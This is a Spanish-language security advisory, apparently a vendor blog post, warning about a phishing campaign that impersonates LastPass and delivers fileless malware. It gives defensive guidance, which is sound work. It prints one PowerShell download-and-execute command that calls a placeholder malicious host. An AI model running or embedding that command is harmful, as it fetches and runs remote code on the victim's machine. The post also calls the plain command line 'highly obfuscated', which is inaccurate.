Si usas LastPass para gestionar tus contraseñas, debes estar alerta: una nueva campaña de phishing está circulando con correos falsos que simulan ser notificaciones oficiales de la compañía. Estos mensajes aseguran que tu cuenta ha sido comprometida y te piden descargar una supuesta “actualización de seguridad” para restaurar el acceso.
El problema es que ese archivo no soluciona nada. En realidad, instala malware en tu equipo capaz de robar credenciales, registrar tus pulsaciones de teclado y propagarse por la red. La amenaza, activa desde principios de octubre, ya ha afectado a múltiples usuarios y empresas en todo el mundo.
En TecnetOne te contamos cómo funciona este fraude, qué señales debes observar y qué medidas puedes tomar para proteger tus datos y sistemas.
Cómo operan los correos falsos de LastPass
Los mensajes fraudulentos están diseñados para parecer legítimos. Usan el logotipo, los colores corporativos y un tono de urgencia que busca provocar una reacción rápida. El asunto suele ser algo como:
“Tu cuenta de LastPass ha sido vulnerada. Descarga esta actualización urgente.”
Dentro del correo, los atacantes incluyen enlaces que aparentan dirigir a dominios auténticos de LastPass, pero si los analizas con atención, notarás pequeñas variaciones en las direcciones (por ejemplo, letras duplicadas o dominios poco comunes como “.support-secure.com”).
Cuando haces clic, el enlace redirige a un servidor controlado por los atacantes, donde se aloja un archivo comprimido llamado “LastPass_Security_Update.zip”.
Ese ZIP contiene un archivo ejecutable con apariencia de instalador legítimo (con extensión .MSI), pero al ejecutarlo descarga malware en segundo plano.
Qué ocurre cuando instalas el archivo
Una vez que el usuario ejecuta el falso instalador, el malware inicia una cadena de acciones automatizadas:
- Copia un script malicioso de PowerShell en la carpeta AppData del sistema.
- Crea una tarea programada para ejecutar ese script de forma recurrente, asegurando su permanencia.
- El script se conecta a un servidor remoto (C2) desde donde descarga una segunda carga maliciosa, capaz de:
- Registrar pulsaciones de teclado (keylogger).
- Capturar pantallas.
- Robar contraseñas y cookies guardadas en navegadores.
- Desplegar otros archivos o comandos dentro de la red corporativa.
El comando que utilizan para iniciar la infección es una línea de PowerShell altamente ofuscada, como esta:
IEX(New-Object Net.WebClient).DownloadString('http://malicious.example.com/loader.ps1')
Este código se ejecuta en memoria, sin escribir nada en disco, lo que le permite evadir la detección de muchos antivirus tradicionales.
Conoce más: Alerta: Falsa app de LastPass en App Store
Un ataque diseñado para pasar desapercibido
El ataque es especialmente sofisticado porque aprovecha un método de ejecución sin archivos (fileless), lo que lo hace más difícil de detectar.
En lugar de guardar scripts o ejecutables visibles, carga el código directamente en la memoria del sistema, evitando así las alertas de seguridad comunes.
Además, el malware se mantiene activo al inyectarse en procesos legítimos de Windows, como svchost.exe.
Esta técnica, conocida como DLL injection, le permite operar con permisos elevados y ejecutar tareas sin levantar sospechas.
En entornos corporativos, el impacto puede ser grave: el malware puede moverse lateralmente a través de la red, comprometiendo otros equipos o servidores.
Cómo identificar los correos falsos
Los correos fraudulentos de esta campaña son visualmente convincentes, pero si prestas atención, hay señales claras para identificarlos:
- Direcciones de remitente sospechosas: en lugar de venir de @lastpass.com, usan variantes como @lastpass-security.net o @support-lasspass.io.
- Errores gramaticales o frases genéricas: por ejemplo, “descargue el parche antes de perder acceso permanente”.
- Enlaces que no coinciden con el dominio oficial: al pasar el cursor sobre el enlace (sin hacer clic), notarás una dirección diferente.
- Urgencia exagerada: cualquier correo que te presione para actuar “de inmediato” debe ponerte en alerta.
- Archivos adjuntos comprimidos (.zip, .rar): LastPass nunca envía parches o instaladores por correo electrónico.
.webp?width=1006&height=470&name=Phishing%20email%20(Source%20%E2%80%93%20LastPass).webp)
Correo electrónico de phishing (Fuente: LastPass)
Cómo protegerte y qué hacer si ya caíste
Desde TecnetOne, te recomendamos seguir estas medidas para mantenerte protegido frente a este tipo de ataques:
- No descargues ni ejecutes archivos adjuntos sospechosos.
Si recibes un correo que dice venir de LastPass (o de cualquier otro servicio), no abras los archivos ni hagas clic en los enlaces. Accede manualmente al sitio oficial escribiendo la dirección en el navegador.
- Verifica siempre el remitente.
Los atacantes suelen usar direcciones falsas que parecen auténticas. Si algo no encaja, comprueba la autenticidad antes de actuar.
- Activa la autenticación multifactor (MFA).
Si alguien logra obtener tu contraseña, el MFA puede evitar que acceda a tus cuentas.
- Monitorea la actividad de tu sistema.
Los administradores de TI deben vigilar el uso de PowerShell, revisar las tareas programadas y analizar conexiones a servidores desconocidos.
- Usa soluciones de seguridad con detección de comportamiento.
Un antivirus tradicional puede no detectar estos ataques fileless. Es mejor optar por herramientas con detección en memoria y análisis de comportamiento, como las que ofrecen tecnologías EDR (Endpoint Detection & Response).
- Cambia tus contraseñas si crees que has sido víctima.
Si descargaste el archivo o ejecutaste el instalador, cambia tus contraseñas inmediatamente desde otro dispositivo limpio y notifica a tu equipo de seguridad.
Lee más: LastPass Alerta Sobre Gestores de Contraseñas Falsos
Qué significa esto para las empresas
Los ataques de phishing corporativo como este se han vuelto más frecuentes y sofisticados. Los ciberdelincuentes saben que la confianza en marcas reconocidas (como LastPass, Microsoft o Adobe) aumenta la efectividad del engaño.
En un entorno empresarial, basta con que un solo empleado caiga en la trampa para comprometer toda la red interna. Por eso, las compañías deben:
- Implementar políticas de ciberseguridad claras y entrenar a su personal.
- Usar filtros de correo avanzados que detecten phishing y adjuntos sospechosos.
- Establecer canales seguros de comunicación interna para reportar incidentes.
- Asegurar que los sistemas estén actualizados y con parches al día.
En TecnetOne ayudamos a las empresas a detectar y bloquear campañas de phishing antes de que lleguen al usuario final, utilizando tecnologías de análisis de comportamiento, inteligencia de amenazas y protección basada en IA.
Conclusión: la mejor defensa es la prevención
El caso de los falsos correos de LastPass demuestra que el phishing sigue siendo una de las armas más efectivas de los ciberdelincuentes.
No importa qué tan sofisticadas sean las soluciones tecnológicas: el factor humano sigue siendo el punto más vulnerable.
Antes de hacer clic, tómate unos segundos para verificar la fuente. Esa simple precaución puede evitar la pérdida de información, el robo de credenciales y el acceso no autorizado a tus sistemas.
Recuerda: LastPass nunca te pedirá instalar actualizaciones manuales ni enviará archivos adjuntos por correo electrónico.
Si recibes un mensaje sospechoso, repórtalo y elimina el correo sin abrirlo.
En TecnetOne, nuestro compromiso es ayudarte a construir una cultura de seguridad digital sólida, donde cada persona sea la primera línea de defensa frente a las amenazas.
